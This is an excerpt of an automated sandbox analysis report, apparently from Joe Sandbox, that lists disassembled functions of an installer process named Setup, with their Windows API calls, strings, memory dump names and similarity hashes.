• GetThreadLocale.KERNEL32(?,DHTMLHeader.html), ref: 69DB4041
• GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104), ref: 69DB40B3
• PathFileExistsW.SHLWAPI(?,00000014,00000000), ref: 69DB4101
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: FileH_prolog3$ExistsLocaleModuleNamePathThread
• String ID: %04d\%s$DHTMLHeader.html
• API String ID: 3575165106-1224721414
• Opcode ID: 4b055991096b735d65ad4e7b4c423d17505ce38f9eecc002908bd1349396e941
• Instruction ID: 3e6e2e30d89a1f6f580b41dd46843b4a29ba17a7bb073a1381b00c2ebfbe409d
• Opcode Fuzzy Hash: 4b055991096b735d65ad4e7b4c423d17505ce38f9eecc002908bd1349396e941
• Instruction Fuzzy Hash: 8D415A7590015ADFDF00DFA8C885EEEBBB9BF05318F008578E511EB691DB349A09CBA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 698F6041: __EH_prolog3.LIBCMT ref: 698F6048
  • Part of subcall function 698F6041: GetCommandLineW.KERNEL32(0000001C,698E30C2,?), ref: 698F604D
• RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?), ref: 698E3136
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: CommandExceptionH_prolog3LineRaise
• String ID: CreateLayout$Install$Repair$Uninstall$UninstallPatch
• API String ID: 683617612-791770018
• Opcode ID: 6148ff580f7deae8f49492e07d13e95aa24a4ffb840ce71c79f24993685d1dde
• Instruction ID: 90f7b2f41461e1228ed73a9e214d2ad1ea8d9be14fc646a95563da6bedab55fd
• Opcode Fuzzy Hash: 6148ff580f7deae8f49492e07d13e95aa24a4ffb840ce71c79f24993685d1dde
• Instruction Fuzzy Hash: 7F01B53620854DA7DE20D76EC821E4D7659AF923B8F558C2FFA14DB1B0DA32DC4A8351
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698E33FA
• LoadLibraryW.KERNEL32(?,00000008,698E3377,?), ref: 698E3427
• GetLastError.KERNEL32 ref: 698E3437
  • Part of subcall function 698DB93E: __EH_prolog3.LIBCMT ref: 698DB945
• GetLastError.KERNEL32 ref: 698E344B
• __CxxThrowException@8.LIBCMT ref: 698E346E
Strings
• ::LoadLibrary(%s) failed with error %d, xrefs: 698E343C
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: ErrorH_prolog3Last$Exception@8LibraryLoadThrow
• String ID: ::LoadLibrary(%s) failed with error %d
• API String ID: 3804648058-20907036
• Opcode ID: f4021baefaf40290829fc3aafba2d70dc5bb6b2419fc2d3805e343cf90505584
• Instruction ID: 4e3cc54a746aaed292a24eb8358e82b5beda24e74d6ca3115bdbbf3e462a1b16
• Opcode Fuzzy Hash: f4021baefaf40290829fc3aafba2d70dc5bb6b2419fc2d3805e343cf90505584
• Instruction Fuzzy Hash: 5C018FB1900206AFDB00DF69C845B2E7AA4FF21344F90892DE418DB250D775D91ACBD1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D7548C
• GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,69D77DAF,?,?,?,?,?,00000000,?,?,69D6AB18,00000008,69D77CD9), ref: 69D7549C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 69D754B9
• GetNativeSystemInfo.KERNEL32(?), ref: 69D754E0
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$AddressHandleInfoModuleNativeProcSystem
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2427612476-192647395
• Opcode ID: b3b34822d3a740543c38b717507f0cea9a17b7efd6ccf98c4534bcd60a008d2f
• Instruction ID: 613589a392bfc3238981eac8542b017772e0d2e1bca4fe3ea6a36d6fd2c68508
• Opcode Fuzzy Hash: b3b34822d3a740543c38b717507f0cea9a17b7efd6ccf98c4534bcd60a008d2f
• Instruction Fuzzy Hash: 95F09075A54605EBEF10EFA4DA15B9D3276AF8131AFA0C434F000EBD50DB78894987A6
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698F6821
• GetLastError.KERNEL32(00000008,698F50A0,?,00000000,00000000,?,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6834
• SetLastError.KERNEL32(00000000,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6840
• FormatMessageW.KERNEL32(00000500,00000000,00000000,00000000,2F25BB2A,00000000,2F25BB2A,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6854
• GetLastError.KERNEL32(?,698E8DC8,?,%1!I64u!,?,?), ref: 698F685A
• SetLastError.KERNEL32(?,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6868
• LocalFree.KERNEL32(2F25BB2A,?,2F25BB2A,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6878
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: ErrorLast$FormatFreeH_prolog3LocalMessage
• String ID:
• API String ID: 69132360-0
• Opcode ID: f2907c43dca608ffed21fd5a96372f7babef85b52d0297455534f50db59782a1
• Instruction ID: 5d64464df16a0331c2d8da959f53cccaa38ba5dcc9c46625244896f176f30d42
• Opcode Fuzzy Hash: f2907c43dca608ffed21fd5a96372f7babef85b52d0297455534f50db59782a1
• Instruction Fuzzy Hash: 40F0F935800159EBDF00EFA6CD44DAEBF79FFA1745F00541EA520A2060DB718D16DBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSecurityDescriptorLength.ADVAPI32(?,69D6A5CC,?), ref: 69DA3A1F
• _malloc.LIBCMT ref: 69DA3A29
  • Part of subcall function 69DCBFB3: __FF_MSGBANNER.LIBCMT ref: 69DCBFCC
  • Part of subcall function 69DCBFB3: __NMSG_WRITE.LIBCMT ref: 69DCBFD3
  • Part of subcall function 69DCBFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,69DA831D,00000000,?,69DCC0C9,69DAF845,00000C00,00000020,69DAF845,?), ref: 69DCBFF8
• GetSecurityDescriptorControl.ADVAPI32(?,00000002,69DA7448), ref: 69DA3A49
• _free.LIBCMT ref: 69DA3A5D
• _memcpy_s.LIBCMT ref: 69DA3A80
• MakeSelfRelativeSD.ADVAPI32(?,69DA744C,69DA744C), ref: 69DA3A97
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: DescriptorSecurity$AllocateControlHeapLengthMakeRelativeSelf_free_malloc_memcpy_s
• String ID:
• API String ID: 2479111529-0
• Opcode ID: ea19760fd7d7c15a8a1a735b082662a20c1ce8f437ae49722ff2ccb88c837730
• Instruction ID: a5d64e261a4771dd7567e8298bb35497fe0f18313c5d4bd7c3fb3c9abcdd6592
• Opcode Fuzzy Hash: ea19760fd7d7c15a8a1a735b082662a20c1ce8f437ae49722ff2ccb88c837730
• Instruction Fuzzy Hash: BC11E17A800214FBDB009BA5C904FAFFBBDEF41B14B00803AE515E3940EB35DA10DB62
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_catch.LIBCMT ref: 69DAF8D8
• GetCommandLineW.KERNEL32(00000044,69DA8323,00000000), ref: 69DAF8EA
  • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
• __time64.LIBCMT ref: 69DAFA7B
  • Part of subcall function 69DA72E4: __EH_prolog3_catch.LIBCMT ref: 69DA72EB
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3_catch$CommandH_prolog3Line__time64
• String ID: %TEMP%\$Setup
• API String ID: 3716462386-3413213476
• Opcode ID: 0310d3aaffa008e06b594965ebb85a61e1aa3e87ead707fd7a90f497948594c2
• Instruction ID: 53e34b190e72f8105a27a5e97f8ac81a5d2c2d2eae3b3841a1930c85144fc6dc
• Opcode Fuzzy Hash: 0310d3aaffa008e06b594965ebb85a61e1aa3e87ead707fd7a90f497948594c2
• Instruction Fuzzy Hash: 6E713675900249DFCF01CFE8C984AEEBBB5BF49318F2481A9E411BB790DB359A44CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D93EB9
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: ProcessBlocks$ProductDriveHints$ServiceBlocks$SystemCheck
• API String ID: 431132790-3784926136
• Opcode ID: 72fb9bcb5aa28e86a53b15606aae2c04656032c93b28fee6fd35d9081ae773a8
• Instruction ID: df3abe5fb780f359ed13b5bc24437539500622d1f2a006f047798764b734b1f6
• Opcode Fuzzy Hash: 72fb9bcb5aa28e86a53b15606aae2c04656032c93b28fee6fd35d9081ae773a8
• Instruction Fuzzy Hash: F5514C75904249EFDF10DFA8C985AAEBBB8AF09318F148169F815EB781C734DA05CB71
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA5698
• PathIsRelativeW.SHLWAPI(00000000,?), ref: 69DA5735
• PathFileExistsW.SHLWAPI(00000001,?), ref: 69DA57C3
Strings
• Package authoring error. The Url for this item is not authored and the item does not exist locally: , xrefs: 69DA57FB
• pLocalPath is NULL!!!!!!, xrefs: 69DA585B
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: Path$ExistsFileH_prolog3Relative
• String ID: Package authoring error. The Url for this item is not authored and the item does not exist locally: $pLocalPath is NULL!!!!!!
• API String ID: 1035510722-3253188715
• Opcode ID: 6fcabd89d615d9edd42d477455e2fb8f453ca4b1ceb23fcd373f3bb5f1a13e45
• Instruction ID: 8342c38e686595e37f6ed595fd18d4dd7d3e79fb17cc89d7a3f7ffc228785a3d
• Opcode Fuzzy Hash: 6fcabd89d615d9edd42d477455e2fb8f453ca4b1ceb23fcd373f3bb5f1a13e45
• Instruction Fuzzy Hash: CF51CF76800149EFDB10DFA8C844AEEBBB8AF15358F148175E520EBB91C7349E55CBB2
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D80E9D
  • Part of subcall function 69D78B9F: __EH_prolog3.LIBCMT ref: 69D78BA6
• __CxxThrowException@8.LIBCMT ref: 69D81011
Strings
• schema validation failure: , xrefs: 69D80F73
• must have exactly 2 child nodes, xrefs: 69D80F88
• ParameterInfo.xml, xrefs: 69D80F63
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8Throw
• String ID: must have exactly 2 child nodes$ParameterInfo.xml$schema validation failure:
• API String ID: 2489616738-936724439
• Opcode ID: 08a9ad82e7520e1cddbf9d1a0c7aed847d1242cf93f01ea53876131fe82937a3
• Instruction ID: a55a51ec81041a8b39cc75f7c6613c596b923e44d22ade0d43be2c6b6224265a
• Opcode Fuzzy Hash: 08a9ad82e7520e1cddbf9d1a0c7aed847d1242cf93f01ea53876131fe82937a3
• Instruction Fuzzy Hash: E4514D75901245EFDB11DFE8C984BAEBBB8AF09318F14C168E115DB681CB35EA05CB71
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D811FD
  • Part of subcall function 69D78B9F: __EH_prolog3.LIBCMT ref: 69D78BA6
• __CxxThrowException@8.LIBCMT ref: 69D8132C
Strings
• schema validation failure: Not must have exactly 1 child node, xrefs: 69D8129F
• Not, xrefs: 69D81240
• ParameterInfo.xml, xrefs: 69D812AD
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8Throw
• String ID: Not$ParameterInfo.xml$schema validation failure: Not must have exactly 1 child node
• API String ID: 2489616738-1102589135
• Opcode ID: c4992b153fbd55a51628324d41e35cbbf38d2d5b7fa017e5cc467553e0c2de32
• Instruction ID: 7d0cca9f793c7f047fabdad66287428abbbb44c67470b2f502c72635e6f08406
• Opcode Fuzzy Hash: c4992b153fbd55a51628324d41e35cbbf38d2d5b7fa017e5cc467553e0c2de32
• Instruction Fuzzy Hash: B3414171900249EFDB11DBE8C945FAEBBB8BF15318F148168E115EB691CB35EA04CBB1
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 69D85044: __EH_prolog3.LIBCMT ref: 69D8504B
  • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
  • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
  • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
  • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
  • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
• GetCommandLineW.KERNEL32(?,?,?,?,F0D05EFD,?,?,?,?,ParameterInfo.xml,?,?,00000738,69DAFA6E,?,69D6A794), ref: 69DB97B2
  • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
• SysFreeString.OLEAUT32(?), ref: 69DB985E
  • Part of subcall function 69D84798: __EH_prolog3.LIBCMT ref: 69D8479F
  • Part of subcall function 69D850D5: __EH_prolog3_catch.LIBCMT ref: 69D850DC
  • Part of subcall function 69D850D5: CoInitialize.OLE32(00000000), ref: 69D8512A
  • Part of subcall function 69D850D5: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,00000738,?,?,?,00000000,?,?,?,F0D05EFD,?,?,?), ref: 69D85148
  • Part of subcall function 69D850D5: CoUninitialize.OLE32(02602230,?,succeeded,?,?,?,00000000,?,?,?,F0D05EFD,?,?,?), ref: 69D851E6
• SysFreeString.OLEAUT32(?), ref: 69DB9818
• SysFreeString.OLEAUT32(?), ref: 69DB9833
Strings
• Loading localized engine data for language %d from %s, xrefs: 69DB977B
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrowUninitialize
• String ID: Loading localized engine data for language %d from %s
• API String ID: 509998568-3315213612
• Opcode ID: dae7116aba91969c80c9e6557b82f8393c50517869752903092f098962adf288
• Instruction ID: 03e2d4df2cf8d8e9e0e5127a98dfb81fe87aca960315723f8fa0b5e735052bbc
• Opcode Fuzzy Hash: dae7116aba91969c80c9e6557b82f8393c50517869752903092f098962adf288
• Instruction Fuzzy Hash: 48414E76008380AFD711DF64CC45E9FBBECAF95328F004A29F59597691DB34D908CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DB988C: __EH_prolog3.LIBCMT ref: 69DB9893
  • Part of subcall function 69DB988C: GetCommandLineW.KERNEL32(0000002C,69DBD52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DB98B4
  • Part of subcall function 69DB988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69DB996E
  • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
  • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
  • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
  • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
  • Part of subcall function 69D857E5: __EH_prolog3.LIBCMT ref: 69D857EC
  • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
  • Part of subcall function 69D7A8CC: SetFilePointer.KERNEL32(?,00000000,69D6A794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 69D7AA49
  • Part of subcall function 69D7A8CC: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7AA97
  • Part of subcall function 69D7A8CC: SysAllocStringLen.OLEAUT32(00000000,?), ref: 69D7AAAC
• SysFreeString.OLEAUT32(?), ref: 69D8578A
• SysFreeString.OLEAUT32(?), ref: 69D85799
• SysFreeString.OLEAUT32(?), ref: 69D857C7
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3String$FileFree$PathRelative$AllocCommandException@8LineModuleNamePointerReadThrow_memcpy_s
• String ID: ParameterInfo.xml$UiInfo.xml
• API String ID: 3873923459-386449131
• Opcode ID: 6aa75d2d4bbc9222ba7cda1daa53f162696523a955ef271b738a2aff186a284e
• Instruction ID: 824b1f9f0116f8a02dee22c057fd130dfe2c7609745570ce3f362450a4f813d6
• Opcode Fuzzy Hash: 6aa75d2d4bbc9222ba7cda1daa53f162696523a955ef271b738a2aff186a284e
• Instruction Fuzzy Hash: 2231BDB6408345EBCB00DF68CD40E4BBBE8FF95628F405A2DF490D7691D735D8088BA2
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D819B4
                                                                                                                                                                      • Part of subcall function 69D78B9F: __EH_prolog3.LIBCMT ref: 69D78BA6
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D81ADE
                                                                                                                                                                    Strings
                                                                                                                                                                    • can only have one logical or arithmietic expression for a child node, xrefs: 69D81A54
                                                                                                                                                                    • schema validation failure: , xrefs: 69D81A40
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D81902, 69D81A2F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: can only have one logical or arithmietic expression for a child node$ParameterInfo.xml$schema validation failure:
                                                                                                                                                                    • API String ID: 2489616738-4045823434
                                                                                                                                                                    • Opcode ID: cfec078a6797511c6ee6d969818325e5b014ac80b34cecb6bf2a2ee88a1467ba
                                                                                                                                                                    • Instruction ID: d41c5e69e767cec03f6b8b1ee2822472a6281a7fc99cd9e21be2ec630df5850d
                                                                                                                                                                    • Opcode Fuzzy Hash: cfec078a6797511c6ee6d969818325e5b014ac80b34cecb6bf2a2ee88a1467ba
                                                                                                                                                                    • Instruction Fuzzy Hash: 7C413075900249EFDB10DFE8C944BAEBBB8BF05318F14C165E425EB681CB35DA05CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D81D44
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D819AD: __EH_prolog3.LIBCMT ref: 69D819B4
                                                                                                                                                                      • Part of subcall function 69D819AD: __CxxThrowException@8.LIBCMT ref: 69D81ADE
                                                                                                                                                                      • Part of subcall function 69D78AAC: __EH_prolog3.LIBCMT ref: 69D78AB3
                                                                                                                                                                      • Part of subcall function 69D78AAC: __CxxThrowException@8.LIBCMT ref: 69D78B39
                                                                                                                                                                      • Part of subcall function 69D792D1: __EH_prolog3.LIBCMT ref: 69D792D8
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D81E11
